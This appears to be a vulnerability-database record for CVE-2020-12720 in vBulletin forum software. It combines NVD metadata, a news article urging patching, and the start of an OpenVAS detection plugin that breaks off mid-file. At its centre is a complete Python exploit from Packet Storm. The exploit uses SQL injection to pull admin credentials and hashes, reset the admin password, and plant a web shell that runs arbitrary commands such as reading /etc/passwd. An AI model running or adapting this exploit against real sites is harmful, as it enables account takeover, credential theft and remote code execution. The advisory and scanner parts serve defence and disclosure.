{"id": "CVE-2020-12720", "bulletinFamily": "NVD", "title": "CVE-2020-12720", "description": "vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.", "published": "2020-05-08T00:15:00", "modified": "2020-05-15T17:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12720", "reporter": "cve@mitre.org", "references": ["https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1", "http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html"], "cvelist": ["CVE-2020-12720"], "type": "cve", "lastseen": "2020-05-16T12:55:13", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2020-12720"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-05-08T11:24:22", "references": [], "rev": 2}, "score": {"modified": "2020-05-08T11:24:22", "rev": 2, "value": 2.7, "vector": "NONE"}}, "hash": "0eba393dff718efb2a36e58384bf0065fe403bf86103c995f1d742c54815307d", "hashmap": [{"hash": "d599751c996065f553e9b52432029ad1", "key": "href"}, {"hash": "7d41316ce8aff550c12eae84a4d50666", "key": "published"}, {"hash": "b488e9cbbd5eab8f86d53373694193e5", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "0af47608b45160b74e5b6236f09d5b37", "key": "description"}, {"hash": "7d41316ce8aff550c12eae84a4d50666", "key": "modified"}, {"hash": "48a092f16aafe5693923e1267f4de614", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a4daf2b07fb75ab26cdab409762f5cc3", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12720", "id": "CVE-2020-12720", "lastseen": "2020-05-08T11:24:22", "modified": "2020-05-08T00:15:00", "objectVersion": "1.3", "published": "2020-05-08T00:15:00", "references": ["https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1"], "reporter": "cve@mitre.org", "title": "CVE-2020-12720", "type": "cve", "viewCount": 47}, "differentElements": ["modified"], "edition": 1, "lastseen": "2020-05-08T11:24:22"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2020-12720"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-05-09T11:18:52", "references": [{"idList": ["OPENVAS:1361412562310143872"], "type": "openvas"}, {"idList": ["THN:5D5DD3DDBE383EE75BB80DC87C54F2A1"], "type": "thn"}, {"idList": ["VBULLETIN_CVE-2020-12720_DIRECT.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2020-05-09T11:18:52", "rev": 2, "value": 4.4, "vector": "NONE"}}, "hash": "ba1596dfc13e35c5942c2d1c57850c1810b0d4ec7c25bf6918b4589996456972", "hashmap": [{"hash": "d599751c996065f553e9b52432029ad1", "key": "href"}, {"hash": "7d41316ce8aff550c12eae84a4d50666", "key": "published"}, {"hash": "b488e9cbbd5eab8f86d53373694193e5", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "0af47608b45160b74e5b6236f09d5b37", "key": "description"}, {"hash": "e27a4ae14070c29e0bead8605d824162", "key": "modified"}, {"hash": "48a092f16aafe5693923e1267f4de614", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a4daf2b07fb75ab26cdab409762f5cc3", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12720", "id": "CVE-2020-12720", "lastseen": "2020-05-09T11:18:52", "modified": "2020-05-08T12:33:00", "objectVersion": "1.3", "published": "2020-05-08T00:15:00", "references": ["https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1"], "reporter": "cve@mitre.org", "title": "CVE-2020-12720", "type": "cve", "viewCount": 48}, "differentElements": ["cpe23", "cvss", "references", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 2, "lastseen": "2020-05-09T11:18:52"}], "edition": 3, "hashmap": [{"key": "affectedSoftware", "hash": "3fb0e663005b3e28ba4b15aec9b30217"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "fb782e1fa4f7b4ca8d51e4bec865cfef"}, {"key": "cpe23", "hash": "c9cc4391e41063057f4354e36f65b54b"}, {"key": "cvelist", "hash": "48a092f16aafe5693923e1267f4de614"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "f3619d5136781acc264d05416b99b693"}, {"key": "description", "hash": "0af47608b45160b74e5b6236f09d5b37"}, {"key": "href", "hash": "d599751c996065f553e9b52432029ad1"}, {"key": "modified", "hash": "5ef41d0baae76b72a02061a1f702667c"}, {"key": "published", "hash": "7d41316ce8aff550c12eae84a4d50666"}, {"key": "references", "hash": "f0c41d3db5dce58b408f8191a1f4ac6f"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "b488e9cbbd5eab8f86d53373694193e5"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b3b8e2af05f6760a1cab0810a053cd8b2aa7ebe06a95d42df7fb222041734f4a", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "thn", "idList": ["THN:5D5DD3DDBE383EE75BB80DC87C54F2A1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157716"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143872"]}, {"type": "nessus", "idList": ["VBULLETIN_CVE-2020-12720_DIRECT.NASL"]}], "modified": "2020-05-16T12:55:13", "rev": 2}, "score": {"value": 4.4, "vector": "NONE", "modified": "2020-05-16T12:55:13", "rev": 2}, "vulnersScore": 4.4}, "objectVersion": "1.3", "cpe": ["cpe:/a:vbulletin:vbulletin:5.4.3", "cpe:/a:vbulletin:vbulletin:5.5.2", "cpe:/a:vbulletin:vbulletin:5.2.1", "cpe:/a:vbulletin:vbulletin:5.0.2", "cpe:/a:vbulletin:vbulletin:5.0.4", "cpe:/a:vbulletin:vbulletin:5.0.5", "cpe:/a:vbulletin:vbulletin:5.5.3", "cpe:/a:vbulletin:vbulletin:5.0.1", "cpe:/a:vbulletin:vbulletin:5.1.3", "cpe:/a:vbulletin:vbulletin:5.0.0", "cpe:/a:vbulletin:vbulletin:5.5.4", "cpe:/a:vbulletin:vbulletin:5.1.1", "cpe:/a:vbulletin:vbulletin:5.6.0", "cpe:/a:vbulletin:vbulletin:5.2.0", "cpe:/a:vbulletin:vbulletin:5.1.2", "cpe:/a:vbulletin:vbulletin:5.1.0", "cpe:/a:vbulletin:vbulletin:5.2.2", "cpe:/a:vbulletin:vbulletin:5.5.1", "cpe:/a:vbulletin:vbulletin:5.2.6", "cpe:/a:vbulletin:vbulletin:5.5.6", "cpe:/a:vbulletin:vbulletin:5.6.1.-", "cpe:/a:vbulletin:vbulletin:5.0.3", "cpe:/a:vbulletin:vbulletin:5.5.0"], "affectedSoftware": [{"name": "vbulletin vbulletin", "operator": "eq", "version": "5.2.6"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.0.3"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.0.5"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.2.0"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.6.1.-"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.5.3"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.5.0"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.0.2"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.5.6"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.5.2"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.2.2"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.1.2"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.0.1"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.1.3"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.0.0"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.0.4"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.1.1"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.1.0"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.4.3"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.2.1"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.5.4"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.6.0"}, {"name": "vbulletin vbulletin", "operator": "eq", "version": "5.5.1"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.5.6:-:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.6.0:-:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.6.1.-:*:*:*:*:*:*:*"], "cwe": ["CWE-863"], "scheme": null}

{"thn": [{"lastseen": "2020-05-11T20:02:56", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-jG-wVbf392Y/XrmjORfWE_I/AAAAAAAA2vw/b8KJ9oLGU7Y6kfPFnEm2yYdbShUYdUpJACLcBGAsYHQ/s728-e100/vbulletin-forum-hacking.jpg>)\n\nIf you are running an online discussion forum based on vBulletin software, make sure it has been updated to install a newly issued security patch that fixes a critical vulnerability. \n \nMaintainers of the vBulletin project recently announced an important patch update but didn't reveal any information on the underlying security vulnerability, identified as [CVE-2020-12720](<https://nvd.nist.gov/vuln/detail/CVE-2020-12720>). \n \nWritten in PHP programming language, vBulletin is a widely used Internet forum software that powers over 100,000 websites on the Internet, including forums for some Fortune 500 and many other top companies. \n \nConsidering that the popular forum software is also one of the favorite targets for hackers, holding back details of the flaw could, of course, help many websites apply patches before hackers can exploit them to compromise sites, servers, and their user databases. \n\n\n \nHowever, just like previous times, researchers and hackers have already started reverse-engineering the software patch to locate and understand the vulnerability. \n \nNational Vulnerability Database (NVD) is also analyzing the flaw and revealed that the critical flaw originated from an incorrect access control issue that affects vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1. \n \n\"If you are using a version of vBulletin 5 Connect prior to 5.5.2, it is imperative that you upgrade as soon as possible,\" vBulletin said. \n \nThough there was no proof-of-concept code available at the time of writing this news or information about the vulnerability being exploited in the wild, expectedly, an exploit for the flaw wouldn't take much time to surface on the Internet. \n \nMeanwhile, [Charles Fol](<https://twitter.com/cfreal_/status/1258752351160209409>), a security engineer at Ambionics, confirmed that he discovered and responsibly reported this vulnerability to the vBulletin team, and has plans to release more information during the SSTIC conference that's scheduled for the next month. \n \nForum administrators are advised to download and install respective patches for the following versions of their forum software as soon as possible. \n \n\n\n * 5.6.1 Patch Level 1\n * 5.6.0 Patch Level 1\n * 5.5.6 Patch Level 1\n \n \n \n \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/thehackernews/>).\n", "modified": "2020-05-11T19:11:00", "published": "2020-05-11T19:11:00", "id": "THN:5D5DD3DDBE383EE75BB80DC87C54F2A1", "href": "https://thehackernews.com/2020/05/vBulletin-access-vulnerability.html", "type": "thn", "title": "An Undisclosed Critical Vulnerability Affect vBulletin Forums \u2014 Patch Now", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-05-17T09:39:05", "bulletinFamily": "exploit", "description": "", "modified": "2020-05-15T00:00:00", "published": "2020-05-15T00:00:00", "id": "PACKETSTORM:157716", "href": "https://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html", "title": "vBulletin 5.6.1 SQL Injection", "type": "packetstorm", "sourceData": "`# Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection \n# Date: 2020-05-15 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1 \n# Version: vBulletin v5.6.x (prior to Patch Level 1) \n# Tested on: vBulletin v5.6.1 on Debian 10 x64 \n# CVE: CVE-2020-12720 vBulletin v5.6.1 (SQLi) with path to RCE \n \n#!/usr/bin/env python3 \n''' \n \n \nCopyright 2020 Photubias(c) \n \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2020-12720.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \n##-->> Full creds to @zenofex and @rekter0 <<--## \n''' \nimport urllib.request, urllib.parse, sys, http.cookiejar, ssl, random, string \n \n## Static vars; change at will, but recommend leaving as is \nsADMINPASS = '12345678' \nsCMD = 'id' \nsURL = 'http://192.168.50.130/' \nsUSERID = '1' \nsNEWPASS = '87654321' \niTimeout = 5 \n \n## Ignore unsigned certs \nssl._create_default_https_context = ssl._create_unverified_context \n \n## Keep track of cookies between requests \ncj = http.cookiejar.CookieJar() \noOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) \n \ndef randomString(stringLength=8): \nletters = string.ascii_lowercase \nreturn ''.join(random.choice(letters) for i in range(stringLength)) \n \ndef getData(sUrl, lData): \ntry: \noData = urllib.parse.urlencode(lData).encode() \noRequest = urllib.request.Request(url = sUrl, data = oData) \nreturn oOpener.open(oRequest, timeout = iTimeout) \nexcept: \nprint('----- ERROR, site down?') \nsys.exit(1) \n \ndef verifyBug(sURL,sUserid='1'): \nsPath = 'ajax/api/content_infraction/getIndexableContent' \nlData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,\"cve-2020-12720\",8,7,6,5,4,3,2,1;--'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nif not 'cve-2020-12720' in sResponse: \nprint('[!] Warning: not vulnerable to CVE-2020-12720, credentials are needed!') \nreturn False \nelse: \nprint('[+] SQLi Success!') \nreturn True \n \ndef takeoverAccount(sURL, sNEWPASS): \nsPath = 'ajax/api/content_infraction/getIndexableContent' \n### Source: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 \n## Get Table Prefixes \nlData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\\'phrasegroup_cppermission\\';--'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nif 'rawtext' in sResponse: sPrefix = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('\"','').replace('language','') \nelse: sPrefix = '' \n#print('[+] Got table prefix \"'+sPrefix+'\"') \n \n## Get usergroup ID for \"Administrators\" \nlData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'usergroup WHERE title=\\'Administrators\\';--'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nsGroupID = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('\"','') \n#print('[+] Administrators Group ID: '+sGroupID) \n \n## Get admin data, including original token (password hash), TODO: an advanced exploit could restore the original hash in post exploitation \nlData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from ' + sPrefix + 'user where usergroupid=' + sGroupID + ';--'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nsUsername,sUserid,sUsermail,sUserTokenOrg = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('\"','').split('|') \n#print('[+] Got original token (' + sUsername + ', ' + sUsermail + '): ' + sUserTokenOrg) \n \n## Let's create a Human Verify Captcha \nsPath = 'ajax/api/hv/generateToken?' \nlData = {'securitytoken':'guest'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nif 'hash' in sResponse: sHash = sResponse.split('hash')[1].split(':')[1].replace('}','').replace('\"','') \nelse: sHash = '' \n \n## Get the captcha answer from DB \nsPath = 'ajax/api/content_infraction/getIndexableContent' \nlData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit 0,1--'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nif 'rawtext' in sResponse: iAnswers = int(sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('\"','')) \nelse: iAnswers = 1 \n \nlData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit ' + str(iAnswers-1) + ',1--'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nif 'rawtext' in sResponse: sAnswer = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('\"','') \nelse: sAnswer = '' \n \n## Now request PW reset and retrieve the token \nsPath = 'auth/lostpw' \nlData = {'email':sUsermail,'humanverify[input]':sAnswer,'humanverify[hash]':sHash,'securitytoken':'guest'} \nsResponse = getData(sURL + sPath, lData).read().decode() \n \nsPath = 'ajax/api/content_infraction/getIndexableContent' \nlData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'useractivation WHERE userid=' + sUserid + ' limit 0,1--'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nif 'rawtext' in sResponse: sToken = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('\"','') \nelse: sToken = '' \n \n## Finally the password reset itself \nsPath = 'auth/reset-password' \nlData = {'userid':sUserid,'activationid':sToken,'new-password':sNEWPASS,'new-password-confirm':sNEWPASS,'securitytoken':'guest'} \nsResponse = getData(sURL + sPath, lData).read().decode() \nif not 'Logging in' in sResponse: \nprint('[-] Failed to reset the password') \nreturn '' \nelse: \nprint('[+] Success! User ' + sUsername + ' now has password ' + sNEWPASS) \nreturn sUserid \n \ndef createBackdoor(sURL, sADMINPASS, sUserid='1'): \n## Activating Sitebuilder \nsPath = 'ajax/activate-sitebuilder' \nlData = {'pageid':'1', 'nodeid':'0','userid':'1','loadMenu':'false', 'isAjaxTemplateRender':'true', 'isAjaxTemplateRenderWithData':'true','securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'} \noResponse = getData(sURL + sPath, lData) \nif not oResponse.code == 200: \nprint('[-] Error activating sitebuilder') \nsys.exit(1) \n \n## Confirming the password, getting new securitytoken \nsPath = 'auth/ajax-login' \nlData = {'logintype':'cplogin','userid':sUserid,'password':sADMINPASS,'securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'} \noResponse = getData(sURL + sPath, lData) \nsResponse = oResponse.read().decode() \nif 'lostpw' in sResponse: \nprint('[-] Error: authentication for userid ' + sUserid + ' failed') \nsys.exit(1) \nsToken = sResponse.split(',')[1].split(':')[1].replace('\"','').replace('}','') \nprint('[+] Got token: '+sToken) \n \n## cpsession is needed, use this for extra verification \n#for cookie in cj: print(cookie.name, cookie.value, cookie.domain) #etc etc \n \n## First see if our backdoor does not already exists \nsPath = 'ajax/render/admin_sbpanel_pagelist_content_wrapper' \nlData = {'isAjaxTemplateRenderWithData':'true','securitytoken':sToken} \noResponse = getData(sURL + sPath, lData) \nsResponse = oResponse.read().decode() \nif 'cve-2020-12720' in sResponse: \nsPageName = 'cve-2020-12720-' + sResponse.split('/cve-2020-12720-')[1].split(')')[0] \nprint('[+] This machine was already pwned, using \"' + sPageName + '\" for your command') \nreturn sPageName \n \n \n## Create a new empty page \nsPath = 'ajax/api/widget/saveNewWidgetInstance' \nlData = {'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':sToken} \noResponse = getData(sURL + sPath, lData) \nsResponse = oResponse.read().decode() \nsWidgetInstanceID = sResponse.split(',')[0].split(':')[1].replace('}','') \nsPageTemplateID = sResponse.split(',')[1].split(':')[1].replace('}','') \nprint('[+] Got WidgetInstanceID: '+sWidgetInstanceID+' and PageTemplateID: '+sPageTemplateID) \n \n## Now submitting the page content \nsPageName = 'cve-2020-12720-'+randomString() \nsPath = 'ajax/api/widget/saveAdminConfig' \nlData = {'widgetid':'23', \n'pagetemplateid':sPageTemplateID, \n'widgetinstanceid':sWidgetInstanceID, \n'data[widget_type]':'', \n'data[title]':sPageName, \n'data[show_at_breakpoints][desktop]':'1', \n'data[show_at_breakpoints][small]':'1', \n'data[show_at_breakpoints][xsmall]':'1', \n'data[hide_title]':'0', \n'data[module_viewpermissions][key]':'show_all', \n'data[code]':\"echo('###SHELLRESULT###');system($_GET['cmd']);echo('###SHELLRESULT###');\", \n'securitytoken':sToken} \noResponse = getData(sURL + sPath, lData) \nif not oResponse.code == 200: print('[!] Error submitting page content for ' + sPageName) \n \n## Finally saving the new page \nsPath = 'admin/savepage' \nlData = {'input[ishomeroute]':'0', \n'input[pageid]':'0', \n'input[nodeid]':'0', \n'input[userid]':'1', \n'input[screenlayoutid]':'2', \n'input[templatetitle]':sPageName, \n'input[displaysections[0]]':'[{\"widgetId\":\"23\",\"widgetInstanceId\":\"' + sWidgetInstanceID + '\"}]', \n'input[displaysections[1]]':'[]', \n'input[displaysections[2]]':'[]', \n'input[displaysections[3]]':'[]', \n'input[pagetitle]':sPageName, \n'input[resturl]':sPageName, \n'input[metadescription]':'Photubias+Shell', \n'input[pagetemplateid]':sPageTemplateID, \n'url':sURL, \n'securitytoken':sToken} \noResponse = getData(sURL + sPath, lData) \nif not oResponse.code == 200: print('[!] Error saving page content for ' + sPageName) \nreturn sPageName \n \ndef main(): \nif len(sys.argv) == 1: \nprint('[!] No arguments found: python3 CVE-2020-12720.py <URL> <CMD>') \nprint(' Example: ./CVE-2020-12720.py http://192.168.50.130/ \"cat /etc/passwd\"') \nprint(' But for now, ask questions then') \nsURL = input('[?] Please enter the address and path to vBulletin ([http://192.168.50.130/): ') \nif sURL == '': sURL = 'http://192.168.50.130' \nelse: \nsURL = sys.argv[1] \nsCMD = sys.argv[2] \nif not sURL[:-1] == '/': sURL += '/' \nif not sURL[:4].lower() == 'http': sURL = 'http://' + sURL \nprint('[+] Welcome, first verifying the SQLi vulnerability') \nif verifyBug(sURL): \nprint(\"----\\n\" + '[+] Attempting automatic admin account takeover') \nsUSERID = takeoverAccount(sURL, sNEWPASS) \nsADMINPASS = sNEWPASS \nif sUSERID == '': \nsUSERID = '1' \nsADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ') \nelse: \nsADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ') \nprint(\"----\\n\"+'[+] So far so good, attempting the creation of the backdoor') \nsPageName = createBackdoor(sURL, sADMINPASS, sUSERID) \n \nif len(sys.argv) == 1: sCMD = input('[?] Please enter the command to run [id]: ') \nif sCMD == '': sCMD = 'id' \nsCmd = urllib.parse.quote(sCMD) \nsPath = sPageName + \"?cmd=\" + sCmd \n \nprint('[+] Opening '+sURL + sPath) \ntry: \noRequest = urllib.request.Request(url = sURL + sPath) \noResponse = oOpener.open(oRequest, timeout = iTimeout) \nprint('#######################') \nsResponse = oResponse.read().decode() \nprint('[+] Command result:') \nprint(sResponse.split('###SHELLRESULT###')[1]) \nexcept: \nprint('[-] Something went wrong, bad command?') \nsys.exit(1) \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157716/vbulletin561-sql.txt"}], "openvas": [{"lastseen": "2020-05-16T15:42:40", "bulletinFamily": "scanner", "description": "vBulletin has incorrect access controls.", "modified": "2020-05-11T00:00:00", "published": "2020-05-11T00:00:00", "id": "OPENVAS:1361412562310143872", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143872", "title": "vBulletin < 5.6.1 Security Patch Level 1 Vulnerability", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:vbulletin:vbulletin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143872\");\n script_version(\"2020-05-11T02:51:53+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-11 02:51:53 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-11 02:36:36 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2020-12720\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); # Patch level not detected\n\n script_name(\"vBulletin < 5.6.1 Security Patch Level 1 Vulnerability\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"vbulletin_detect.nasl\");\n script_mandatory_keys(\"vbulletin/detected\");\n\n script_tag(name:\"summary\", value:\"vBulletin has incorrect access controls.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"vBulletin versions prior to 5.5.6 Patch Level 1, 5.6.0 Patch Level 1 and\n 5.6.1 Patch Level 1.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.5.6 Patch Level 1, 5.6.0 Patch Level 1, 5.6.1 Patch Level 1\n or later.\");\n\n 